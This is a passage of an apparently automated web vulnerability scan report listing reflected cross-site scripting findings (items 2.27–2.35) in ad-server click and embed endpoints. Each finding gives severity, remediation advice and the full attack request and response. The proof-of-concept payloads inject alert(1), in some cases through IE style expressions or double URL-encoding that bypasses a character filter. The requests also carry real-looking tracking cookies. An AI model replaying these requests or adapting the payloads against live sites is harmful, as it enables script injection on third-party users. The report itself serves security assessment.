GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345442a2'-alert(1)-'cd57e5a21a7&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345442a2'-alert(1)-'cd57e5a21a7&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.27. http://vulnerable.verizon.host/adj/N4682.Acerno/B4830992.3 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N4682.Acerno/B4830992.3

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87703'-alert(1)-'a236e466c18 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4682.Acerno/B4830992.3;click=87703'-alert(1)-'a236e466c18 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?.s1hAHthFwDAHmgAAAAAAHShGgAAAAAAAABUAAIAAAAAAAsAAQABCNJSJAAAAAAACEkjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAONQ8AAAAAAAIAAgAAAAAAAACC9UoI1z89CtejcD3uPwAApkGjc-A.mpmZmZmZ9T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACKK.FG1ggyCb3tmg0XegECrHQPH.ypdrokZj0rAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26anmember%3D316%26anprice%3D30%26s%3D1532283%26_salt%3D4222244446%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F%26r%3D1,b657adce-f576-11df-b592-00237d0614d3
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 272
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 21 Nov 2010 14:01:50 GMT
Expires: Sun, 21 Nov 2010 14:01:50 GMT

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a59/4/1c/%2a/n;44306;0-0;0;53018500;1-468/60;0/0/0;;~sscs=%3f87703'-alert(1)-'a236e466c18"><img src="http://s0.2mdn.net/v
...[SNIP]...

2.28. http://vulnerable.verizon.host/click [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /click

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83023"%3balert(1)//6bee66d0b85 was submitted in the h parameter. This input was echoed as 83023";alert(1)//6bee66d0b85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/83023"%3balert(1)//6bee66d0b85 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:33:59 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("83023";alert(1)//6bee66d0b85?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAI
...[SNIP]...

2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /click

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f1fe"%3balert(1)//424e902531b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f1fe";alert(1)//424e902531b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/&2f1fe"%3balert(1)//424e902531b=1 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:34:10 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("&2f1fe";alert(1)//424e902531b=1?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAA
...[SNIP]...

2.30. http://vulnerable.verizon.host/clk [210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934 was submitted in the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter. This input was echoed as df4be"style="x:expression(alert(1))"f02ba6ee934 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-dealsdf4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=65AA8158EA066D92E8A31EB8E79C4D1D; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=17815415861290224134566; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:34 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:34 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:35:34|A|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:35:34 GMT; Path=/
Set-Cookie: logging=65AA8158EA066D92E8A31EB8E79C4D1D|egapp10p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x638| |1290224134569|bn30| |11/19/2010 21:35:34 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:35:34 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:35:34 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73945525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 183827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t
...[SNIP]...
<Meta Name="DCSext.ndid" CONTENT="air-cheap-flight-dealsdf4be"style="x:expression(alert(1))"f02ba6ee934,NC"/>
...[SNIP]...

2.31. http://vulnerable.verizon.host/clk [cnt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2 was submitted in the cnt parameter. This input was echoed as beb2f"style="x:expression(alert(1))"1aa717214d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955744;24466695;s?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PRObeb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=85B85A67F46114EF05E439166A0257A3; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=2658358851290224164552; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:36:04 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:36:04 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:36:04|B|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:36:04 GMT; Path=/
Set-Cookie: logging=85B85A67F46114EF05E439166A0257A3|egapp56p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x638| |1290224164555|bn30| |11/19/2010 21:36:04 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:36:04 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:36:03 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3272945525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 176301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xh
...[SNIP]...
<Meta Name="DCSext.ndtab" CONTENT="PRObeb2f"style="x:expression(alert(1))"1aa717214d2"/>
...[SNIP]...

2.32. http://vulnerable.verizon.host/clk [gcid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the gcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc was submitted in the gcid parameter. This input was echoed as 8c66e"style="x:expression(alert(1))"9cd31f2b2bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-deals&gcid=C11287x6388c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=815C45600BA07FC8F91BF98A73CC851B; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=10302318551290224142818; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:42 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:42 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:35:42|A|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:35:42 GMT; Path=/
Set-Cookie: logging=815C45600BA07FC8F91BF98A73CC851B|egapp48p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x6388c66e\"style=\"x:expression(alert(1))\"9cd31f2b2bc| |1290224142821|bn30| |11/19/2010 21:35:42 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:35:42 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:35:42 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3272145525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 33858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&spu=C11287x6388c66e"style="x:expression(alert(1))"9cd31f2b2bc&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1290224142838&">
...[SNIP]...

2.33. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cead%2522%253balert%25281%2529%252f%252f70bc5b86024 was submitted in the REST URL parameter 2. This input was echoed as 5cead";alert(1)//70bc5b86024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead%2522%253balert%25281%2529%252f%252f70bc5b86024/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead";alert(1)//70bc5b86024/1354.0.iframe.200x33/1290209587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.34. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb was submitted in the REST URL parameter 2. This input was echoed as 99764"><script>alert(1)</script>e90710d87cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135799764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135799764"><script>alert(1)</script>e90710d87cb/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.35. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325 was submitted in the REST URL parameter 3. This input was echoed as 94844"><script>alert(1)</script>b32014b325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
